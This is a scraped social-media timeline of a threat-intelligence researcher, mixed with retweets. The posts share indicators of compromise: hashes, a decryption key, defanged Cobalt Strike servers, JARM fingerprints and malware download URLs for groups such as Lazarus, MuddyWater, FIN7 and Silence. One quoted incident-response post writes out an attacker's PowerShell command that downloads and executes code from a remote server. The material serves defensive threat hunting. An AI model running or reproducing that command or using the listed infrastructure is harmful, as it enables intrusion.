Rustam Mirkasymov
@Ta1ien

266 posts

Joined February 2011
210 Following 456 Followers
Rustam Mirkasymov@Ta1ien·
Cybersecurity is full of exceptional people - and true friends. Don’t miss them while drowning in alerts.
Rustam Mirkasymov
Rustam Mirkasymov@Ta1ien·
@craiu It was dead. I checked on the day the article went public. Thanks for sharing!
Costin Raiu
Costin Raiu@craiu·
A story in four acts:
Rustam Mirkasymov
Rustam Mirkasymov@Ta1ien·
MISTPEN 2ff5f461ae6b94b7cae8114c94d55fe3f4f40fc30db82446a62758e532557de7 uploaded from Romania. Can be decrypted by b68a90b703750beaff2869b686c4adddcd47702d6a06b591ee7ac22b67d331b0 #Lazarus #Dreamjob
Rustam Mirkasymov Retweeted
Group-IB Threat Intelligence
New #HsHarada #CobaltStrike server: 103.35.190[.]215. Fully aligns with the heuristic described by us earlier twitter.com/GroupIB_TI/sta…
Group-IB Threat Intelligence@GroupIB_TI

82.117.254[.]222 hosts a specific #SSL certificate with jarm 2ad2ad16d2ad2ad00042d42d00042ddb04deffa1705e2edc44cae1ed24a4da issued by v5.90.org. Additional #CobaltStrike watermark 391144938 gives confident attribution to #HsHarada servers. Old server: 166.1.18[.]197 Alive #HsHarada CS servers: 195.123.242[.]122, 195.123.242[.]143, 195.123.240[.]5 Happy hunting!

Rustam Mirkasymov Retweeted
Group-IB Threat Intelligence
Group-IB Threat Intelligence@GroupIB_TI·
82.117.254[.]222 hosts a specific #SSL certificate with jarm 2ad2ad16d2ad2ad00042d42d00042ddb04deffa1705e2edc44cae1ed24a4da issued by v5.90.org. Additional #CobaltStrike watermark 391144938 gives confident attribution to #HsHarada servers. Old server: 166.1.18[.]197 Alive #HsHarada CS servers: 195.123.242[.]122, 195.123.242[.]143, 195.123.240[.]5 Happy hunting!
GroupIB_DFIR@GroupIB_DFIR

2/2 Instead of smb beacon for lateral movement they just run the same posh script on every new host "powershell IEX (new-object net.webclient).downloadstring http://82.117.254[.]222:80..."

Group-IB Threat Intelligence
The Group-IB’s Threat Intelligence team has discovered a potentially new legitimate tool in the possession of the #MuddyWater group. The files with the SHA1 hashes: 69f68529e07f2463eb105cfc87df04539e969a56 (attachments./zip) and 81c06183b1bb146f5f1a5f1d03ac44fa9d68d341 (defence-video./zip) were uploaded to VirusTotal on October 30, 2023. Inside the archives, there is a directory named "2023", which includes: 1) Shortcut - Attachments.lnk 2) A hidden subdirectory "Document" containing a Decoy document - 84609.pdf or scan.pdf 3) A hidden subdirectory "Windows.Diagnostic.Document" containing Diagnostic.exe and a subdirectory .end with an installer for “N‑able, the advanced monitoring agent utility.” The primary function of the dropper is to execute the installer and open the decoy. According to data from N-able (n-able.com/features/advan…), this utility can remotely interact with the device on which the program was launched. Both archives were distributed through the following links: 1) hxxp://a[.]storyblok[.]com/f/259791/x/91e2f5fa2f/attachments[.]zip 2) hxxps://a[.]storyblok[.]com/f/259837/x/21e6a04837/defense-video[.]zip
Rustam Mirkasymov Retweeted
GroupIB_DFIR
GroupIB_DFIR@GroupIB_DFIR·
While 66% of businesses suspect insider attacks, reality proves different. A recent incident our Responsemen handled had a surprising twist. Watch our comic book and read the full story on our blog: bit.ly/46I0PUb #IncidentResponse #FightCyberCrime #CyberSecurity
Rustam Mirkasymov
Rustam Mirkasymov@Ta1ien·
Our DFIR team launched their channel and started with a perfect case which shows the collaboration between @GroupIB_TI and @GroupIB_DFIR. Subscribe to learn the spicy details of our real-life IR cases.
GroupIB_DFIR@GroupIB_DFIR

Last Christmas, Group-IB flagged a C&C server tied to SystemBC backdoor. Quick alerts led to rapid response, safeguarding a European firm from looming #ransomware. Distinct tactics pointed to two threat actors: an access broker and a ransomware assailant.

Rustam Mirkasymov Retweeted
Chris Duggan
Chris Duggan@TLP_R3D·
🔍 Further analysis has unearthed 🕳️ more potential infrastructure linked to the same adversary 😈 using a simple pivot from the CobaltStrike IP and SSH Key. What's even more intriguing is that the same SSH key is being used by #Truebot. 🔹88.214.25.242 0/88 VT 🔹5.188.87.37 11/89 VT 🔹45.227.255.34 1/89 VT 🔹45.182.189.118 9/89 VT 🛡️ Stay on your toes and remain vigilant! 🚨 #CyberSecurity #Pikabot 🤖
Unit 42@Unit42_Intel

2023-10-03 (Tuesday) - #Pikabot infection led to #CobaltStrike HTTPS C2 traffic using zzerxc[.]com on 179.60.149[.]244:443. List of indicators available at bit.ly/3LMc9q3. Thanks to the @Cryptolaemus1 crew for initially reporting today's Pikabot activity!

Rustam Mirkasymov Retweeted
Christian Blichmann 🇺🇦 (on bksy and Mastodon)
In the spirit of "this talk could've been a tweet", I just pushed a button: #BinDiff is now open source. - Snapshot release, no major new functionality - Release binaries later today or tomorrow - This is my 20% and I won't be able to act on PRs until end of Q4 (OOO traveling)
Rustam Mirkasymov
Rustam Mirkasymov@Ta1ien·
The servers don’t host Truebot; however, the CS configs and domain name conventions are completely similar to those from the PaperCut-related cases.
Group-IB Threat Intelligence@GroupIB_TI

#Silence gang started a new campaign and deployed a few #CobaltStrike servers: tsvsnjv[.]com rokllofrold29[.]com rokllold279[.]com Attribution is based on CS watermarks and the unique domain name template. Final stage is a ransomware, possible types: #CL0P, #bl00dy.

Rustam Mirkasymov Retweeted
Group-IB Global
Group-IB Global@GroupIB·
Group-IB has made a key contribution to the #INTERPOL-led Africa Cyber Surge II operation that spanned 25 countries. Group-IB shared more than 1,000 indicators related to malicious infrastructure across Africa. This successful initiative led to arrests of 14 suspects. More details: bit.ly/45cCmpw @INTERPOL_Cyber #FightAgainsCybercrime
Rustam Mirkasymov Retweeted
Group-IB Global
Group-IB Global@GroupIB·
#Gigabud #RAT is out there expanding its capabilities and targets. Our team recently dissected the fraudulent techniques employed by Gigabud’s operators, using the Group-IB Fraud Matrix. The detailed investigation uncovered more than 400 separate Gigabud.RAT samples, and we outline how the #trojan operates, its previously unknown variants, and the potential risks to organizations, particularly across the Asia-Pacific region. Dive into the full investigation here: bitly.ws/S7Ay #FightAgainstCybercrime
Rustam Mirkasymov Retweeted
Group-IB Threat Intelligence
Group-IB Threat Intelligence@GroupIB_TI·
Global geopolitical conflicts frequently serve as catalysts for #hacktivist activities. In a comprehensive overview, @GroupIB specialists have traced Mysterious Team Bangladesh’s attacks, uncovering their timeline and distribution. Check out our new blog: bitly.ws/PZ4L
Rustam Mirkasymov Retweeted
Group-IB Threat Intelligence
Group-IB Threat Intelligence@GroupIB_TI·
Recently, @WhichbufferArda shared information about #FIN7’s infrastructure that was used to deliver the POWERTRASH loader and Diceloader. We noticed the unique characteristics of these servers, which allowed us to find additional servers, presumably owned by FIN7.
Arda Büyükkaya@WhichbufferArda

FIN7 infrastructure used to deliver POWERTRASH loader. According to @CISACyber same infrastructure used to exploit CVE-2023-27350 PaperCut. @h2jazi @MsftSecIntel virustotal.com/graph/embed/g6…
